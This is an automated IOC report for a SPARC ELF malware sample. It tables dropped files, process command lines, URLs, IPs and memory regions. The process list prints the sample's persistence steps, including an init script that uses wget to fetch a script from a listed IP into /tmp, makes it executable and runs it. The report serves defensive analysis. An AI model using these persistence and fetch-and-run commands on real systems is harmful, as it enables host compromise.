IOC Report
sparc.nn.elf

Files

| File Path | Type | Category | Malicious |
|---|---|---|---|
| sparc.nn.elf | ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped | initial sample | malicious |
| /etc/init.d/sparc.nn.elf | POSIX shell script, ASCII text executable | dropped | malicious |
| /etc/init.d/system | POSIX shell script, ASCII text executable | dropped | malicious |
| /etc/profile | ASCII text | dropped | malicious |
| /etc/rc.local | POSIX shell script, ASCII text executable | dropped | malicious |
| /boot/bootcmd | ASCII text | dropped | |
| /etc/inittab | ASCII text | dropped | |
| /etc/motd | ASCII text | dropped | |
| /etc/systemd/system/custom.service | ASCII text | dropped | |
| /memfd:snapd-env-generator (deleted) | ASCII text | dropped | |
| /tmp/qemu-open.XU5WUT (deleted) | data | dropped | |

Processes

| Path | Cmdline | Malicious |
|---|---|---|
| /tmp/sparc.nn.elf | `/tmp/sparc.nn.elf` | |
| /tmp/sparc.nn.elf | - | |
| /bin/sh | `sh -c "systemctl enable custom.service >/dev/null 2>&1"` | |
| /bin/sh | - | |
| /usr/bin/systemctl | `systemctl enable custom.service` | |
| /tmp/sparc.nn.elf | - | |
| /bin/sh | `sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"` | |
| /bin/sh | - | |
| /usr/bin/chmod | `chmod +x /etc/init.d/system` | |
| /tmp/sparc.nn.elf | - | |
| /bin/sh | `sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"` | |
| /bin/sh | - | |
| /usr/bin/ln | `ln -s /etc/init.d/system /etc/rcS.d/S99system` | |
| /tmp/sparc.nn.elf | - | |
| /bin/sh | `sh -c "echo \"#!/bin/sh\n# /etc/init.d/sparc.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sparc.nn.elf'\n /tmp/sparc.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sparc.nn.elf'\n killall sparc.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sparc.nn.elf"` | |
| /tmp/sparc.nn.elf | - | |
| /bin/sh | `sh -c "chmod +x /etc/init.d/sparc.nn.elf >/dev/null 2>&1"` | |
| /bin/sh | - | |
| /usr/bin/chmod | `chmod +x /etc/init.d/sparc.nn.elf` | |
| /tmp/sparc.nn.elf | - | |
| /bin/sh | `sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"` | |
| /bin/sh | - | |
| /usr/bin/mkdir | `mkdir -p /etc/rc.d` | |
| /tmp/sparc.nn.elf | - | |
| /bin/sh | `sh -c "ln -s /etc/init.d/sparc.nn.elf /etc/rc.d/S99sparc.nn.elf >/dev/null 2>&1"` | |
| /bin/sh | - | |
| /usr/bin/ln | `ln -s /etc/init.d/sparc.nn.elf /etc/rc.d/S99sparc.nn.elf` | |
| /tmp/sparc.nn.elf | - | |
| /tmp/sparc.nn.elf | - | |
| /usr/lib/udisks2/udisksd | - | |
| /usr/sbin/dumpe2fs | `dumpe2fs -h /dev/dm-0` | |
| /usr/lib/systemd/systemd | - | |
| /usr/lib/systemd/system-environment-generators/snapd-env-generator | `/usr/lib/systemd/system-environment-generators/snapd-env-generator` | |
| /usr/lib/udisks2/udisksd | - | |
| /usr/sbin/dumpe2fs | `dumpe2fs -h /dev/dm-0` | |
| /usr/lib/udisks2/udisksd | - | |
| /usr/sbin/dumpe2fs | `dumpe2fs -h /dev/dm-0` | |
| /usr/libexec/gnome-session-binary | - | |
| /bin/sh | `/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping` | |
| /usr/libexec/gsd-housekeeping | `/usr/libexec/gsd-housekeeping` | |

URLs

| Name | IP | Malicious |
|---|---|---|
| http://94.156.227.233/oro1vk/sbin/reboot/usr/sbin/reboot/bin/reboot/usr/bin/reboot/sbin/shutdown/usr | unknown | |
| http://94.156.227.233/ | unknown | |

IPs

| IP | Domain | Country | Malicious |
|---|---|---|---|
| 94.156.227.234 | unknown | Bulgaria | malicious |
| 109.202.202.202 | unknown | Switzerland | |
| 91.189.91.43 | unknown | United Kingdom | |
| 91.189.91.42 | unknown | United Kingdom | |

Memdumps

| Base Address | Regiontype | Protect | Malicious |
|---|---|---|---|
| 7f5154029000 | | page execute read | malicious |
| 7ffd72d56000 | | page read and write | |
| 559e2a47b000 | | page read and write | |
| 7ffd72d7a000 | | page execute read | |
| 7f525cd5e000 | | page read and write | |
| 559e267cd000 | | page read and write | |
| 7f515403f000 | | page read and write | |
| 7f525c266000 | | page read and write | |
| 559e287eb000 | | page read and write | |
| 7f525c274000 | | page read and write | |
| 559e287d4000 | | page execute and read and write | |
| 7f525cdab000 | | page read and write | |
| 7f5254000000 | | page read and write | |
| 7f525c8ea000 | | page read and write | |
| 7f525cd66000 | | page read and write | |
| 7f525cc35000 | | page read and write | |
| 7f525c503000 | | page read and write | |
| 559e267d6000 | | page read and write | |
| 7f525ba63000 | | page read and write | |
| 7f515403a000 | | page read and write | |
| 7f525c8c5000 | | page read and write | |
| 559e2659f000 | | page execute read | |
| 7f5254021000 | | page read and write | |